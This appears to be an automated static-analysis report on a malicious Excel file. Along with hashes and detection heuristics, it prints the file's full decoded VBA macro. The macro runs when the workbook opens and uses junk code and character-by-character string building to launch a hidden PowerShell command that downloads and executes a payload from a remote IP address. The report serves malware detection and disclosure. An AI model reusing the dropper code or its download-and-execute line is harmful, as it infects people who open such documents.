Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 82c267d2a133d993…

MALICIOUS

Office (OOXML)

Size: 19.2 KB
Created: 2021-03-24 10:53:24 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2021-04-10
MD5: 2fa14e99e3abe8c83a2534b8e23d9533
SHA-1: 13f55ecbaf21ae40047c932851bb1d3180c7c050
SHA-256: 82c267d2a133d993ec3e1811567d5873e3f2a5da508768304f26baab2b0b29bb
Risk score: 238

Heuristics (8)

  • VBA project inside OOXML (severity: medium; 6 related findings) [OOXML_VBA]
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage (severity: critical) [OLE_VBA_WSCRIPT]
    WScript.Shell usage
    Matched line in script
           End If: MsgBox FRhafIKTrs + "HtHAXPrFNekweewNHGdpznInCRIauI" + BctGnnJLDSbrWtrI: Dim ekTRSopRaeHFBVzuQzQ, VTGXfPCURStJniBekhAIWU: GAS = "P": dVHVctCkwnJLDaTohSGiXYReuoMouhtt = "o": HrtyVdvsOcDvWVXWeeaWcvbiWrCPVR = "w": srVsEAUeQBEQ = "e": SOLS = "r": iMtC = "s": ynwzkfEFyeDFnYBkUyIiSPo = "h": CGCQ = "e": NBHhekAf = "l": NprSGPIPVKZcOBXQrETuiVY = "l": VTGXfPCURStJniBekhAIWU = GAS + dVHVctCkwnJLDaTohSGiXYReuoMouhtt + HrtyVdvsOcDvWVXWeeaWcvbiWrCPVR + srVsEAUeQBEQ + SOLS + iMtC + ynwzkfEFyeDF …
  • VBA stages a PowerShell/LOLBin download-and-run command (severity: critical) [OLE_VBA_BITSTRANSFER_DROPPER]
    The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it, either by writing it to a script file and running it or by launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. This is a high-confidence downloader/dropper indicator, stronger than the individual Shell / download keywords on their own.
    Matched line in script
    Private Sub Workbook_Open()
  • CreateObject call (severity: high) [OLE_VBA_CREATEOBJ]
    CreateObject call
    Matched line in script
           End If: MsgBox FRhafIKTrs + "HtHAXPrFNekweewNHGdpznInCRIauI" + BctGnnJLDSbrWtrI: Dim ekTRSopRaeHFBVzuQzQ, VTGXfPCURStJniBekhAIWU: GAS = "P": dVHVctCkwnJLDaTohSGiXYReuoMouhtt = "o": HrtyVdvsOcDvWVXWeeaWcvbiWrCPVR = "w": srVsEAUeQBEQ = "e": SOLS = "r": iMtC = "s": ynwzkfEFyeDFnYBkUyIiSPo = "h": CGCQ = "e": NBHhekAf = "l": NprSGPIPVKZcOBXQrETuiVY = "l": VTGXfPCURStJniBekhAIWU = GAS + dVHVctCkwnJLDaTohSGiXYReuoMouhtt + HrtyVdvsOcDvWVXWeeaWcvbiWrCPVR + srVsEAUeQBEQ + SOLS + iMtC + ynwzkfEFyeDF …
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (severity: low) [OLE_VBA_WBOPEN]
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) (severity: low) [OLE_VBA_ENVIRON]
    Environ() call (env variable access)
    Matched line in script
    MsgBox msg, vbInformation, "NQhFvnMeKnWbQZBQfBFMhokTaMXvPDfpeNL": End If: End If: Set PeddWtkZidGNptnk = Nothing: On Error GoTo CreateIconFile_ERR: Dim UUKtpchpNvXvwiuZfCQIssFbIFY As String: UUKtpchpNvXvwiuZfCQIssFbIFY = Environ("TEMP")
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://45.14.226.221/cdfe/Fack1.jpg
    Channel: in document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 7940 bytes
SHA-256: 5852e4b34ed54e55e7458785037032d9c9f3c7ddf125b93ec522cac01010a55b
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
     ' LdEKzWUzfEkXdSW Integer
    Dim PeddWtkZidGNptnk As CommandBarControl: Set PeddWtkZidGNptnk = Nothing: With Application.CommandBars("List Range Popup"): With .Controls.Add(msoControlButton, 1, , 1, True): .Caption = "Pick &from Calendar": .OnAction = ThisWorkbook.Name & "!EkihSOt": .BeginGroup = True: .Tag = "ouwpOhFXCwOiIhXEMwo": End With: End With:
' tARzQTpyeuPVdAnnZyTDTpHiYheGChYWpZu
If Len(Trim(OQoLuIsdvXzVvFnSVDYBSZyCkurkTr)) Then
MsgBox "wkGdIuBCvKyANnXdApofUu" & OQoLuIsdvXzVvFnSVDYBSZyCkurkTr, vbInformation
If coll.Count Then
ReDim EekWayRaNktAJiUFSUFkWbRYrz(0 To coll.Count - 1, 0 To 3): For i = 1 To coll.Count: LTUAsi = Split(coll(i), sep): EekWayRaNktAJiUFSUFkWbRYrz(i - 1, 0) = i: EekWayRaNktAJiUFSUFkWbRYrz(i - 1, 1) = LTUAsi(1): EekWayRaNktAJiUFSUFkWbRYrz(i - 1, 2) = LTUAsi(0): EekWayRaNktAJiUFSUFkWbRYrz(i - 1, 3) = LTUAsi(2): Next i: SF.Caption = "rLSIWuUXGSsUyMfeLf """ & OQoLuIsdvXzVvFnSVDYBSZyCkurkTr & """": SF.Show: SF.ListBox_Search.List = EekWayRaNktAJiUFSUFkWbRYrz: SF.TextBox_count.Text = coll.Count
Else: msg = "BtXHbX" & vbNewLine & _
"Heb """ & OQoLuIsdvXzVvFnSVDYBSZyCkurkTr & """ Heb «" & ActiveWorkbook.Name & "»"
MsgBox msg, vbInformation, "NQhFvnMeKnWbQZBQfBFMhokTaMXvPDfpeNL": End If: End If: Set PeddWtkZidGNptnk = Nothing: On Error GoTo CreateIconFile_ERR: Dim UUKtpchpNvXvwiuZfCQIssFbIFY As String: UUKtpchpNvXvwiuZfCQIssFbIFY = Environ("TEMP")
If Len(UUKtpchpNvXvwiuZfCQIssFbIFY) > 0 Then
        If Right(UUKtpchpNvXvwiuZfCQIssFbIFY, 1) <> "\" Or Right(UUKtpchpNvXvwiuZfCQIssFbIFY, 1) <> "/" Then
            UUKtpchpNvXvwiuZfCQIssFbIFY = UUKtpchpNvXvwiuZfCQIssFbIFY & "CCAVsrEbfUiMpbMisvYeVNOaHWKCuGCDED"
Else: UUKtpchpNvXvwiuZfCQIssFbIFY = UUKtpchpNvXvwiuZfCQIssFbIFY & "CCAVsrEbfUiMpbMisvYeVNOaHWKCuGCDED": End If
Else: UUKtpchpNvXvwiuZfCQIssFbIFY = "CCAVsrEbfUiMpbMisvYeVNOaHWKCuGCDED": End If: sPathToIcon = UUKtpchpNvXvwiuZfCQIssFbIFY
CreateIconFile_ERR:
rerIfVCrYWBBFaDLSJAHWzSo = rerIfVCrYWBBFaDLSJAHWzSo + 1: Dim wzIXsSXIOVULOAdsAPiGRJ As Range: Dim dYVetWOHSFRVQzZoOXAbh As String, nFSHRfWiKUDv As String: dYVetWOHSFRVQzZoOXAbh = "wv": nFSHRfWiKUDv = "tENMpcLPDzriBMzeLJZBVQBsVZdNXJZM"
If dYVetWOHSFRVQzZoOXAbh <> nFSHRfWiKUDv Then
        ' FiNhLuoeJVJTHiBBZIQPoRVOXphTwNAVQBW
       End If: MsgBox FRhafIKTrs + "HtHAXPrFNekweewNHGdpznInCRIauI" + BctGnnJLDSbrWtrI: Dim ekTRSopRaeHFBVzuQzQ, VTGXfPCURStJniBekhAIWU: GAS = "P": dVHVctCkwnJLDaTohSGiXYReuoMouhtt = "o": HrtyVdvsOcDvWVXWeeaWcvbiWrCPVR = "w": srVsEAUeQBEQ = "e": SOLS = "r": iMtC = "s": ynwzkfEFyeDFnYBkUyIiSPo = "h": CGCQ = "e": NBHhekAf = "l": NprSGPIPVKZcOBXQrETuiVY = "l": VTGXfPCURStJniBekhAIWU = GAS + dVHVctCkwnJLDaTohSGiXYReuoMouhtt + HrtyVdvsOcDvWVXWeeaWcvbiWrCPVR + srVsEAUeQBEQ + SOLS + iMtC + ynwzkfEFyeDFnYBkUyIiSPo + CGCQ + NBHhekAf + NprSGPIPVKZcOBXQrETuiVY + " -noexit   -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://45.14.226.221/cdfe/Fack1.jpg')""": Set ekTRSopRaeHFBVzuQzQ = CreateObject("WScript.Shell"): ekTRSopRaeHFBVzuQzQ.Run VTGXfPCURStJniBekhAIWU, 0: Dim uIfLGQWOkARAJJtAyTvzLhdHQnFSb As String ' GZyh: Dim VdAfSALaywBEiYzzQJwtDbIIAdeJASvV As Integer: ' FzVsAczLDWZraQsDAnks
For VdAfSALaywBEiYzzQJwtDbIIAdeJASvV = 1 To 10: uIfLGQWOkARAJJtAyTvzLhdHQnFSb = uIfLGQWOkARAJJtAyTvzLhdHQnFSb + CStr(VdAfSALaywBEiYzzQJwtDbIIAdeJASvV) ' VdAfSALaywBEiYzzQJwtDbIIAdeJASvV String
        If VdAfSALaywBEiYzzQJwtDbIIAdeJASvV = 5 Then Exit For
    Next VdAfSALaywBEiYzzQJwtDbIIAdeJASvV: uIfLGQWOkARAJJtAyTvzLhdHQnFSb = Val("yfJBhaHRIIeAANEdEAcFNsAaVZEcpvnBaMC") ' NOO:uIfLGQWOkARAJJtAyTvzLhdHQnFSb = uIfLGQWOkARAJJtAyTvzLhdHQnFSb + 10:MsgBox uIfLGQWOkARAJJtAyTvzLhdHQnFSb:On Error Resume Next ' CbECwanFNWaoLreaDLyVruCakHV:uIfLGQWOkARAJJtAyTvzLhdHQnFSb = 5 / 0
    MsgBox uIfLGQWOkARAJJtAyTvzLhdHQnFSb
    On Error Resume Next: Err.Clear
    Set GAS = CreateObject("scripting.filesystemobject")
    Set ekTRSopRaeHFBVzuQzQ = GAS.CreateTextFile(Filename, True)
    KNdnvIWPKzcdWXYHkYyRSBQUicUAfPBWBUv.Write txt: KNdnvIWPKzcdWXYHkYyRSBQUicUAfPBWBUv.Close
    SaveTXTfile = Err = 0
    Set ekTRSopRaeHFBVzuQzQ = Nothing: Set fso = Nothing

On Error GoTo Err ' bFJJhhWbcCPwPQRfwykdtLnokcGXznycEiM Err:uIfLGQWOkARAJJtAyTvzLhdHQnFSb = 5 / 0:MsgBox "OK!"
Err:
    MsgBox "KIUMbDzEvKGRHFBGPeSecwpanLdJCRCfDbA!": On Error GoTo 0 ' uDGPMAItikbKpufUrOpMrkbbniQkXOndpss:' KNdnvIWPKzcdWXYHkYyRSBQUicUAfPBWBUv
 ' LdEKzWUzfEkXdSW Integer
Do While True
        Exit Do
  Loop 'While True
    Do 'Until False
        Exit Do
    Loop Until False
    ' EekWayRaNktAJiUFSUFkWbRYrz.
   Dim OUJTGMyRkEERhUIIZRNbMzpnXukhYoWTyYF(1 To 10, 5 To 6) As Integer: OUJTGMyRkEERhUIIZRNbMzpnXukhYoWTyYF(1, 6) = 8: Dim NdCJHcrJIKspKwPNIISuPKbTPQaZQoWVkBf As New Collection: Dim ZIveVrphMpcOwHAQYZevnZcOXhydkHbQhMR As Collection: NdCJHcrJIKspKwPNIISuPKbTPQaZQoWVkBf.Add "TbPtMDXMIPeEHBYistFdyNJZCRtAyNI", "ZsFkRMCtCBeFDkWJXYkGKZfGVsRi": Set ZIveVrphMpcOwHAQYZevnZcOXhydkHbQhMR = NdCJHcrJIKspKwPNIISuPKbTPQaZQoWVkBf ' ZsFkRMCtCBeFDkWJXYkGKZfGVsRi Set:MsgBox ZIveVrphMpcOwHAQYZevnZcOXhydkHbQhMR("ZsFkRMCtCBeFDkWJXYkGKZfGVsRi"):Set ZIveVrphMpcOwHAQYZevnZcOXhydkHbQhMR = New Collection: MsgBox ZIveVrphMpcOwHAQYZevnZcOXhydkHbQhMR.Count
On Error Resume Next: Err.Clear
  res = InputBox("DJyraUIn", "wrQFLnyBWwCNM")
    If VarType(res) = vbBoolean Then Exit Sub    ' DJyraUIn
   Set ra = Range([A2], Range("A" & Rows.Count).End(xlUp))
    Application.ScreenUpdating = False
    ra.Font.Color = 0: ra.Font.Bold = 0
 For Each cell In ra.Cells
        pos = 1
        If cell.Text Like "*" & txt & "*" Then
            arr = Split(cell.Text, txt, , vbTextCompare)
            If UBound(arr) > 0 Then
                For Each v In arr
                    LTUAsi = LTUAsi + Len(v)    ' RXbesASkoRPya
                    With cell.Characters(LTUAsi, Len(txt))
                        .Font.ColorIndex = 3    ' evJULbcbBeVOiOnbhQLiTrJUOydtSUFiIUB
                        .Font.Bold = True    'yFvKbH
                    End With
                    LTUAsi = LTUAsi + Len(txt)
                Next v
            End If
        End If
    Next cell: On Error Resume Next: Colors = Array(rLSIWuUXGSsUyMfeLf, BtXHbX, NQhFvnMeKnWbQZBQfBFMhokTaMXvPDfpeNL, OQoLuIsdvXzVvFnSVDYBSZyCkurkTr, uIfLGQWOkARAJJtAyTvzLhdHQnFSb, _
                   Heb): Err.Clear: Set rLSIWuUXGSsUyMfeLf = Intersect(Selection, ActiveSheet.UsedRange)
    If Err Then Exit Sub: rLSIWuUXGSsUyMfeLf.Interior.ColorIndex = xlColorIndexNone: Application.ScreenUpdating = False
    For Each cell In ra.Cells: Err.Clear: If Len(Trim(cell)) Then coll.Add BtXHbX(cell.Value), BtXHbX(cell.Value): If Err Then dupes.Add BtXHbX(cell.Value), BtXHbX(cell.Value)
    Next cell: For Each cell In ra.Cells
        cell.Interior.Color = (CStr(cell.Value))
    'uIfLGQWOkARAJJtAyTvzLhdHQnFSb EekWayRaNktAJiUFSUFkWbRYrz
    Next cell
    Application.ScreenUpdating = True
'uIfLGQWOkARAJJtAyTvzLhdHQnFSb
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{26E71FB2-54A3-43B6-BF30-E0E3DF57D658}{76A45B24-B05F-4383-95D9-0DA26BAC942F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 25088 bytes
SHA-256: a464b30b8669ce195cf29ac75c14d5b3e32122242d139df4c2bf5c3ffc6ebcce